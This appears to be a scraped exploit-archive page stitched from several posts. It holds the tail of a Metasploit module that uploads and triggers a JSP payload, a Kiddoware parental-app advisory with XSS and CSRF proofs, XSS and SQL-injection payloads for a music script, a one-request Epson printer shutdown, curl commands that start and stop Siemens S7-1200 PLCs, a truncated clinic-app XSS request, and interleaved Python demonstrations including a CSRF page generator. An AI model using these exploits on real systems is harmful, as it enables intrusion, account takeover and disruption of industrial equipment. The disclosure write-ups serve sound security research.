form-data; name=\"javax.faces.source\"\r\n\r\n"<br /> post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"<br /> post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"<br /> post_data << "Content-Type: application/octet-stream\r\n\r\n"<br /> post_data << "#{payload.encoded}\r\n"<br /> post_data << "--#{boundary}--\r\n"<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'data' => post_data,<br /> 'headers' => {<br /> 'Accept' => 'application/xml, text/xml, */*; q=0.01',<br /> 'Faces-Request' => 'partial/ajax',<br /> 'X-RequestedWith' => 'XMLHttpRequest',<br /> 'Content-Type' => "multipart/form-data; boundary=#{boundary}",<br /> 'Accept-Encoding' => 'gzip, deflate'<br /> }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")<br /><br /> print_good("Successfully uploaded '#{payload_name}'")<br /> payload_name<br /> end<br /><br /> def cleanup<br /> if @cleanup_needed == false<br /> return<br /> end<br /><br /> restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'<br /> print_status('Attempting to restore config path')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res<br /> print_error("Could not access FileStore config. 
#{restore_msg}")<br /> return<br /> end<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> unless view_state<br /> print_error("Failed to get view state. #{restore_msg}")<br /> return<br /> end<br /><br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',<br /> 'formFileStoreConfig' => 'formFileStoreConfig',<br /> 'txtUncPath' => @original_config_path,<br /> 'txtVelocityFolder' => '',<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.body&.include?(@original_config_path)<br /> print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")<br /> return<br /> end<br /><br /> print_good('Successfully restored the FileStore config path')<br /> end<br /><br /> def exploit<br /> # Starting off we shouldn't need cleanup, however if we get to the point were we start<br /> # to change config settings then we will need to clean that up.<br /> @cleanup_needed = false<br /><br /> authenticate<br /> configure_filestore<br /> payload_name = upload_payload<br /><br /> register_file_for_cleanup("webapps/#{payload_name}")<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> end<br />end<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230515-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities<br /> product: Kiddoware Kids Place Parental Control Android App<br /> vulnerable version: <=3.8.49<br /> fixed version: 3.8.50 or higher<br /> CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079<br /> impact: High<br /> homepage: https://kiddoware.com<br /> found: 2022-09-29<br /> by: Fabian Densborn (Office Vienna)<br /> Bernhard Gründling (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult.<br /> SEC Consult is part of Eviden, an atos business<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Kiddoware is the world’s leading parental control solutions company<br />with a wide range of products and serving over 5 million families<br />worldwide. 
Kiddoware is committed in helping you to protect your kids<br />while providing you intelligence to be proactive about your child's<br />online activities."<br /><br />Source: https://kiddoware.com/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected version(s) which<br />should be installed immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, to identify and resolve potential further critical security<br />issues.<br /><br />The issues identified in this application were part of our blog post<br />"The hidden costs of parental control apps" published a few months ago:<br />https://r.sec-consult.com/parents<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Login and registration return the password as an MD5 hash<br />Login and registration requests return the unsalted MD5 hash<br />of the password. This indicates that passwords are stored on the<br />server as unsalted MD5, which is fast to brute-force offline and<br />not suitable for password storage in modern applications.<br /><br /><br />2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)<br />The customizable name of the child's device can be used to<br />trigger an XSS payload in the parent web dashboard. Children<br />might be able to attack their parents' account.<br /><br /><br />3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)<br />All requests in the web dashboard are vulnerable to CSRF attacks.<br />The requests contain the device Id of the child device, which the<br />attacker must know in order to successfully attack a child.<br />The device Id cannot be treated as a secret, though, since some<br />requests carry it in the URL. 
An attacker could have obtained the Id<br />through the browser history.<br /><br /><br />4) Arbitrary File Upload to AWS S3 bucket<br />The web dashboard lets parents send files to the child's device.<br />The selected file is uploaded to an AWS S3 bucket and the returned<br />URL will be transmitted to the device which will then download it.<br />It is possible to send arbitrary files to the child's device and<br />thereby upload arbitrary files (size restriction ~10MB) to the<br />AWS S3 bucket. The returned link is publicly available, so it is<br />possible to use the server to spread malware.<br /><br /><br />5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)<br />The child can remove all restrictions temporarily without the parents noticing.<br /><br /><br /><br />Proof of concept:<br />-----------------<br />1) Login and registration returns password as MD5 hash<br />The "Change password" request looks as follows:<br />--------------------------------------------------------------------------------<br />POST /account/change_password/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />[...]<br /><br />old_password=c869123c&new_password=password&confirm_password=password<br />--------------------------------------------------------------------------------<br /><br />The response from the web server contains the hashed, unsalted password:<br />--------------------------------------------------------------------------------<br />{<br /> "error":null,<br /> "result":<br /> {<br /> "email":"xxxxx@example.com",<br /> "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",<br /> "message":"Password successfully changed!"<br /> },<br /> "status":200<br />}<br />--------------------------------------------------------------------------------<br /><br />Proving this is an unsalted MD5 hash:<br /><br />$ echo -n "password" | md5sum -t<br />5f4dcc3b5aa765d61d8327deb882cf99 -<br /><br /><br />2) Stored XSS via device name in parent 
Dashboard (CVE-2023-29079)<br />The device name can be changed from the child's account by sending a POST request<br />to the API with the pushDeviceConfig method. The following payload can be used as<br />a PoC to trigger an alert box on every page of the parent dashboard where the<br />device name is displayed. Children/attackers would be able to take over their<br />parents' accounts via this attack.<br /><br />--------------------------------------------------------------------------------<br />POST /v2/api/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 461<br />Accept-Encoding: gzip, deflate<br />User-Agent: okhttp/3.12.8<br />Connection: close<br /><br />{<br /> "method":"pushDeviceConfig",<br /> "id":null,<br /> "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",<br /> {<br /> "isGPSEnabled":false,"deviceGCMRegID":"",<br /> "deviceUserAgeRange":3,<br /> "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",<br /> [...]<br /> }<br />}<br />--------------------------------------------------------------------------------<br /><br /><br />3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)<br />As an example, an attacker can abuse the CSRF vulnerability to download an<br />arbitrary file to a child's device. All the attacker needs is a form that<br />submits itself on page load. 
If a parent is logged in to the web dashboard<br />and visits this malicious site, the authenticated request will be sent and the<br />file specified in the URL parameter will be downloaded by the child's device.<br /><br />--------------------------------------------------------------------------------<br />POST /account/push_content/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />Origin: https://kidsplace.kiddoware.com<br />Content-Length: 75<br />Connection: close<br /><br />url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX<br />--------------------------------------------------------------------------------<br /><br /><br />4) Arbitrary File Upload to AWS S3 bucket<br />The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket<br />and push them to the child device.<br />--------------------------------------------------------------------------------<br />POST /account/push_content_file/ HTTP/1.1<br />Host: kidsplace.kiddoware.com<br />Cookie: [...]<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551<br />Origin: https://kidsplace.kiddoware.com<br />Content-Length: 296<br />[...]<br /><br />-----------------------------27687116714103572458683268551<br />Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"<br />Content-Type: text/plain<br /><br /><eicar-file><br />-----------------------------27687116714103572458683268551--<br />--------------------------------------------------------------------------------<br /><br />The upload of the eicar file worked without 
errors and could subsequently also be<br />downloaded via the returned link. So there is no antivirus scan on the uploaded files.<br /><br /><br />5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)<br />The child can disable the restrictions of the application without the parents noticing.<br />For this, the following steps are necessary:<br />a) If Android settings are blocked, reboot into Android Safe Mode.<br />b) Disable "Display over other apps" Permission for the app in Android settings.<br />c) After rebooting into normal mode, the child device can be used without restrictions.<br /><br />For example, previously locked apps can now be used. To notice the problem, the parent<br />has to check the parent's dashboard manually, a notification is not sent. If the child<br />turns the permission back on in the meantime, the bypass will go unnoticed.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and downloaded through Google Play store, which was<br />the most recent version available at the time of the test:<br />* 3.8.45<br /><br />Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com<br /> Asking for security contact.<br />2022-11-23: Response received, requesting advisory to be submitted to an employee mail.<br /> No encryption demanded. Advisory sent to vendor.<br />2022-11-28: Vendor informs about ongoing backend rewrites and removing some<br /> upload functionalities. 
Some fixes will be live by Q1 2023.<br /> Everything will be addressed by end of 01-04-2023.<br />2022-12-15: SEC Consult informs about upcoming blog post about parental control apps.<br />2022-12-15: Vendor states that most of the issues have already been fixed.<br />2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities<br /> have been sufficiently addressed. Vendor was informed.<br />2022-12-16: Vendor explains what security measures will be implemented and<br /> informs SEC Consult as soon as this is done.<br />2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published.<br />2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied<br /> patches are not sufficient. Again, informs the vendor about it.<br />2023-02-14: No response from vendor, reminder sent.<br />2023-02-14: Vendor informs SEC Consult that all issues have been resolved.<br />2023-03-10: Requesting CVE numbers.<br />2023-03-12: Assigned CVE number for "Disable child restriction" finding.<br />2023-03-31: Assigned CVE numbers for XSS and CSRF findings.<br />2023-05-15: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately through Google<br />Play store.<br />* Version: 3.8.50 or higher<br /><br /><br />Workaround:<br />-----------<br />No workaround available.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult is part of Eviden, an atos business<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part<br />of Eviden, an atos business. 
It ensures the continued knowledge gain of SEC<br />Consult in the field of network and application security to stay ahead of the<br />attacker. The SEC Consult Vulnerability Lab supports high-quality penetration<br />testing and the evaluation of new offensive and defensive technologies for our<br />customers. Hence our customers obtain the most current information about<br />vulnerabilities and valid recommendation about the risk profile of new<br />technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Densborn, B. Gründling / @2023<br /><br /></code></pre>
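Finding 1 of the advisory above says the change_password response hands back the unsalted MD5 of the new password. The following added example (not code from Kiddoware or from SEC Consult) shows why that matters: the quoted hash falls to a dictionary attack with one MD5 per candidate, and the same work recovers every account sharing that password because nothing is salted. It then shows the shape a stored password hash should have, using PBKDF2-HMAC-SHA256 with a random salt. The wordlist is constructed for the example; the 600,000 iteration default is an assumption taken from common current guidance.

```python
# Added example, not code from the Kiddoware app or the SEC Consult advisory.
# Shows what the leaked hash from finding 1 is worth to an attacker and what a
# salted, iterated password hash looks like instead.
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Hash returned by the change_password response quoted in the advisory.
LEAKED_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Constructed sample wordlist; a real attack uses a large dictionary or
# precomputed tables, which only work because there is no salt.
WORDLIST = ["123456", "qwerty", "letmein", "password", "kidsplace"]


def md5_hex(password: str) -> str:
    """The scheme the advisory infers: a bare MD5 of the password, no salt."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack. One MD5 per candidate, and because there is
    no salt the same candidate hash matches every user with that password."""
    for candidate in wordlist:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = 600_000) -> str:
    """Salted, iterated hash stored as a self-describing 'algo$iter$salt$digest'
    string, so the verifier never has to guess the parameters."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("leaked hash recovers:", crack_unsalted_md5(LEAKED_HASH, WORDLIST))
    stored = pbkdf2_hash("password")
    print("stored form:", stored)
    print("verify ok:", pbkdf2_verify("password", stored))
```

Two hashes of the same password differ because each call draws a fresh salt, which is exactly what makes precomputed tables and cross-account matching useless against the hardened form.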
<pre><code>## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflected<br />and SQLi Vulnerability<br />## Author: nu11secur1ty<br />## Date: 05.16.2023<br />## Vendor: https://www.codester.com/<br />## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script<br />## Reference XSS: https://portswigger.net/web-security/cross-site-scripting<br />## Reference SQLi: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />XSS: The value of the q request parameter is copied into the HTML<br />document as text between TITLE tags. The payload<br />aw9rx</title><script>alert(1)</script>rg1m6 was submitted in the q<br />parameter. This input was echoed unmodified in the application's<br />response.<br />--------------------------------------------------------------------------------------------------------------------------------<br />SQLi: The q parameter appears to be vulnerable to SQL injection<br />attacks. The payloads 70346811' or 7218=7218-- and 18028207' or<br />8587=8593-- were each submitted in the q parameter. 
These two requests<br />resulted in different responses, indicating that the input is being<br />incorporated into a SQL query in an unsafe way.<br /><br />STATUS: CRITICAL Vulnerability<br /><br />[+]Exploit-XSS-test:<br />```XSS<br />GET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2<br />Host: gaanagawaana.codesler.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br />[+]Response-XSS-test:<br />```<br />HTTP/2 200 OK<br />Cache-Control: no-store, max-age=0, no-cache<br />Date: Tue, 16 May 2023 06:39:12 GMT<br />Content-Type: text/html; charset=UTF-8<br />Server: Apache<br /><br /><html><br /><head><br /><title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download, Listen & Lyrics</title><br /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br />```<br />--------------------------------------------------------------------<br /><br />[+]Payload-SQLi:<br />```SQLi<br />---<br />Parameter: q (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/codester/2023/GaanaGawaana-Music-Platform-PHP-Script-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/gaanagawaana-10-xss-reflected-sqli-for.html)<br /><br />## Time spent:<br />01:10:00<br /><br /><br /></code></pre>
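The SQLi description above rests on one observation: two tautology payloads in q, one true (7218=7218) and one false (8587=8593), yield different pages. The following added example (not code from the GaanaGawaana script) reproduces that boolean-blind signal against an in-memory SQLite table and shows that a bound parameter removes it. The query shape LIKE '%q%' is an assumption, chosen because the sqlmap payload quoted above (leading %' and trailing 'nMde%'='nMde) only makes sense in that context; the song titles are constructed sample data.

```python
# Added example, not code from the GaanaGawaana script: the boolean-blind
# detection described above, run against an assumed LIKE '%q%' search.
import sqlite3
from typing import Callable, List

# Payloads quoted in the write-up.
TRUE_PAYLOAD = "70346811' or 7218=7218-- "
FALSE_PAYLOAD = "18028207' or 8587=8593-- "
SQLMAP_PAYLOAD = "-5722%' OR 2476=2476 AND 'nMde%'='nMde"

# Constructed sample data standing in for the script's songs table.
SAMPLE_TITLES = ["Aaja Nachle", "Chaiyya Chaiyya", "Tum Hi Ho"]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE songs (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    con.executemany("INSERT INTO songs (title) VALUES (?)",
                    [(t,) for t in SAMPLE_TITLES])
    return con


def search_vulnerable(con: sqlite3.Connection, q: str) -> List[str]:
    """q is pasted into the SQL text, so its quote, OR and -- are interpreted.
    Results are sorted because an injected comment can swallow any ORDER BY."""
    sql = f"SELECT title FROM songs WHERE title LIKE '%{q}%'"
    return sorted(row[0] for row in con.execute(sql))


def search_safe(con: sqlite3.Connection, q: str) -> List[str]:
    """q travels as a bound value; the wildcards are added to the value,
    never to the SQL, so quotes and comment markers are just characters."""
    sql = "SELECT title FROM songs WHERE title LIKE ?"
    return sorted(row[0] for row in con.execute(sql, (f"%{q}%",)))


def is_blind_injectable(con: sqlite3.Connection,
                        search: Callable[[sqlite3.Connection, str], List[str]]) -> bool:
    """The check Burp and sqlmap perform: a true/false tautology pair that
    changes the response means q reaches the query as SQL, not as data."""
    return search(con, TRUE_PAYLOAD) != search(con, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = build_db()
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(name, "true:", fn(db, TRUE_PAYLOAD), "false:", fn(db, FALSE_PAYLOAD),
              "injectable:", is_blind_injectable(db, fn))
```

With the concatenated query the true payload returns every row and the false one returns none; with the bound parameter both return nothing, which is why the scanner's differential test stops firing once the fix is in.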
<pre><code># Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2020-05-16<br /># Vendor Homepage: https://www.epson.es/<br /># Software Link : https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w<br /># Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0<br /># Tested on: Linux/Windows<br /># Vulnerability Type: Denial of Service (DoS)<br /><br />1. Description<br /><br />The printer powers off when a request for /PRESENTATION/HTML/TOP/INDEX.HTML<br />contains two or more consecutive '&' characters in the query string, so a<br />single GET request from the network is enough to cause a denial of service.<br /><br />2. Proof of Concept<br /><br />Request:<br /><br />curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"<br /><br />3. Solution:<br /><br />This product version is deprecated.<br /><br /></code></pre>
<pre><code># Exploit Title: Siemens SIMATIC S7-1200 CPU Start/Stop Command - Cross-Site Request Forgery<br /># Google Dork: inurl:/Portal/Portal.mwsl<br /># Date: 2022-03-24<br /># Exploit Author: RoseSecurity<br /># Vendor Homepage: https://www.siemens.com/global/en.html<br /># Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3<br /># Tested on: Kali Linux<br /># CVE: CVE-2015-5698<br /><br /><br /><br /># IP == PLC IP address<br /><br /># Start Command<br /><br />curl -i -s -k -X $'POST' \<br />  -H $'Host: <IP>' \<br />  -H $'Content-Length: 19' \<br />  -H $'Cache-Control: max-age=0' \<br />  -H $'Upgrade-Insecure-Requests: 1' \<br />  -H $'Origin: http://<IP>' \<br />  -H $'Content-Type: application/x-www-form-urlencoded' \<br />  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' \<br />  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \<br />  -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' \<br />  -H $'Accept-Encoding: gzip, deflate' \<br />  -H $'Accept-Language: en-US,en;q=0.9' \<br />  -H $'Connection: close' \<br />  -b $'siemens_automation_no_intro=TRUE' \<br />  --data-binary $'Run=1&PriNav=Start' \<br />  'http://<IP>/CPUCommands'<br /><br /># Stop Command<br /><br />curl -i -s -k -X $'POST' \<br />  -H $'Host: <IP>' \<br />  -H $'Content-Length: 19' \<br />  -H $'Cache-Control: max-age=0' \<br />  -H $'Upgrade-Insecure-Requests: 1' \<br />  -H $'Origin: http://<IP>' \<br />  -H $'Content-Type: application/x-www-form-urlencoded' \<br />  -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' \<br />  -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \<br />  -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' \<br />  -H $'Accept-Encoding: gzip, deflate' \<br />  -H $'Accept-Language: en-US,en;q=0.9' \<br />  -H $'Connection: close' \<br />  -b $'siemens_automation_no_intro=TRUE' \<br />  --data-binary $'Run=1&PriNav=Stop' \<br />  'http://<IP>/CPUCommands'<br /><br /># Note: curl sets Content-Length from --data-binary by itself. The explicit<br /># "Content-Length: 19" header overrides that and does not match the bodies<br /># (Run=1&PriNav=Start is 18 bytes, Run=1&PriNav=Stop is 17), so drop that -H<br /># if the PLC stalls waiting for the missing byte.<br /></code></pre>
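Both the Kiddoware push_content request (finding 3 of the SEC Consult advisory above) and the S7-1200 CPUCommands request are plain form posts whose only ambient credential is whatever cookies the victim's browser already holds for the host, which is what makes them forgeable from any page the victim visits. The following added example (not code from Kiddoware, Siemens or either advisory) builds the self-submitting attacker page the advisory describes for both requests, and beside it the server-side check that would reject such a page: a per-session synchronizer token plus an Origin/Referer comparison. The address 192.0.2.10 stands in for <IP>, and the csrf_token field name and the HMAC-derived token scheme are assumptions of the example.

```python
# Added example, not code from Kiddoware, Siemens, or either advisory:
# the auto-submitting CSRF page for both requests on this page, beside the
# synchronizer-token plus Origin check that would have rejected it.
import hmac
import html
import secrets
from typing import Dict
from urllib.parse import urlsplit


def csrf_poc_html(action: str, fields: Dict[str, str]) -> str:
    """Attacker page: a hidden form that posts to `action` as soon as it loads.
    The victim's browser attaches its cookies for that host, so the server
    sees an authenticated request the user never chose to send."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<!DOCTYPE html>\n"
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{html.escape(action, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>\n"
    )


# The two requests on this page, rebuilt as forgeable forms.
KIDDOWARE_POC = csrf_poc_html(
    "https://kidsplace.kiddoware.com/account/push_content/",
    {"url": "https://google.de/index.html", "message": "", "deviceID": "XXXXXXX"},
)
S7_STOP_POC = csrf_poc_html(  # 192.0.2.10 is a placeholder for the PLC's <IP>
    "http://192.0.2.10/CPUCommands", {"Run": "1", "PriNav": "Stop"}
)


class CsrfGuard:
    """Server side: a state-changing POST must carry a per-session token,
    which a cross-site page cannot read, and come from the site's own origin."""

    def __init__(self, site_origin: str):
        self.site_origin = site_origin
        self._key = secrets.token_bytes(32)  # server secret, never sent out

    def issue_token(self, session_id: str) -> str:
        """Token the site embeds in its own forms, bound to the session."""
        return hmac.new(self._key, session_id.encode(), "sha256").hexdigest()

    def _origin_ok(self, headers: Dict[str, str]) -> bool:
        value = headers.get("Origin") or headers.get("Referer")
        if not value:  # neither header present: treat as cross-site
            return False
        got, want = urlsplit(value), urlsplit(self.site_origin)
        # exact scheme+host match; a prefix test would pass site.com.evil.example
        return (got.scheme, got.netloc) == (want.scheme, want.netloc)

    def allow(self, session_id: str, headers: Dict[str, str],
              form: Dict[str, str]) -> bool:
        token = form.get("csrf_token", "")
        return self._origin_ok(headers) and hmac.compare_digest(
            token, self.issue_token(session_id))


if __name__ == "__main__":
    print(KIDDOWARE_POC)
    print(S7_STOP_POC)
```

A browser submitting either generated form sends Origin: https://attacker-site and no csrf_token, so the guard rejects it on both counts; the same fields posted from the site's own page with its embedded token pass.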
<pre><code># Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)<br /># Date: 27-06-2019<br /># Exploit Author: Rafael Pedrero<br /># Vendor Homepage: https://bigprof.com<br /># Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system<br /># Version : 2.2<br /># Category: webapps<br /># Tested on: Windows 7 64 Bits / Windows 10 64 Bits<br /># CVE :<br /><br /># Vulnerability Type: Stored Cross-Site Scripting<br /><br />1. Description<br /><br />Online Clinic Management System 2.2 does not sufficiently encode<br />user-controlled input, resulting in a stored Cross-Site Scripting (XSS)<br />vulnerability via the FirstRecord parameter of /clinic/medical_records_view.php,<br />reachable through both GET and POST requests.<br /><br /><br />2. Proof of Concept<br /><br />GET:<br />http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=<br /><br />POST:<br />POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Content-Type: multipart/form-data; boundary=---------------------------1512016725878<br />Content-Length: 1172<br />Origin: https://127.0.0.1<br />Connection: keep-alive<br />Referer: https://127.0.0.1/clinic/medical_records_view.php<br />Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]<br />Upgrade-Insecure-Requests: 1<br />Host: 127.0.0.1<br /><br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="current_view"<br /><br />DVP<br />-----------------------------1512016725878<br />Content-Disposition: form-data; name="SortField"<br /><br /><br />-----------------------------1512016725878<br />Content-Disposition: 